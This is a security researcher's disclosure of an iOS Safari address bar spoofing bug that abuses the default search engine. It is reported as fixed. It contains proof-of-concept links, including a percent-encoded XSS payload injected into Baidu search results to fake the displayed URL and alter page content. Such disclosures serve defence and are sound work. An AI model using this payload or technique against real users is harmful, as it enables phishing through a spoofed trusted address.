Apple Safari Addressbar Spoofing Attacks with Search Engines on IOS

I reported the vulnerability to the APPLE in February 1, 2016 , The vulnerabilities are discussed in this article have been fixed. I think this is a very interesting logical bug, which makes the smart search bar becoming dangerous!

 

AFFECTED PRODUCTS

——————–

User Agent:

Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/ 601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E5191d Safari/601.1

DESCRIPTION

——————–

In the Safari browser for IOS, the addressbar and the smart search bar are combined together, in the settings of the Safari can choose the default search engine: such as YAHOO, Google, Bing, Baidu, DuckDuckGo……. when searching for a URL in the default search engine,the URL will be displayed on the Omnibox. According to this characteristic, if the search engine has XSS, an attacker can make a arbitrary URL in the addressbar ,and change the page’s content to spoofing attack.

PoC

——————–

Testing environment:

1, set the default search engine for Baidu

2, IPhone/IPAD

(1) Safari search in IPhone

POC:

<a href="https://www.baidu.com/s?tn=baidu&word=google.com">iphone</a>

search_spoof_1

(2) Safari search in IPAD

POC:

<a href="https://www.baidu.com/s?tn=baidu&wd=google.com">IPad</a>

search_spoof_2

 

(3) Addressbar Spoofing Attacks with Search Engines

If the search engine has XSS, an attacker can make a arbitrary URL in the addressbar ,and change the page’s content to spoofing attack.Here I found a Baidu search engine XSS to prove the spoofing attack.

POC:

<a href="https://www.baidu.com/s?word=%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%70%6F%6F%66%2E%63%6F%6D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%62%6F%64%79%20%73%74%79%6C%65%3D%22%62%61%63%6B%67%72%6F%75%6E%64%3A%72%65%64%3B%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%22%3E%3C%2F%62%6F%64%79%3E&ms=1"><h1>iPhone-safari-spoof</h1></a>

search_spoof_3

Online DEMO: http://xisigr.com/test/spoof/safari/url20165055483693fb8543.html

FIXED

——————–

Found a XSS in search engines of “Google, YAHOO, Bing……” is very hard. So APPLE repair scheme is to add the search mark in Smart Search bar.

search_spoof_4

CREDIT

——————–

This vulnerability was discovered by xisigr of Tencent’s Xuanwu Lab

(http://www.tencent.com).

Email:xisigr@gmail.com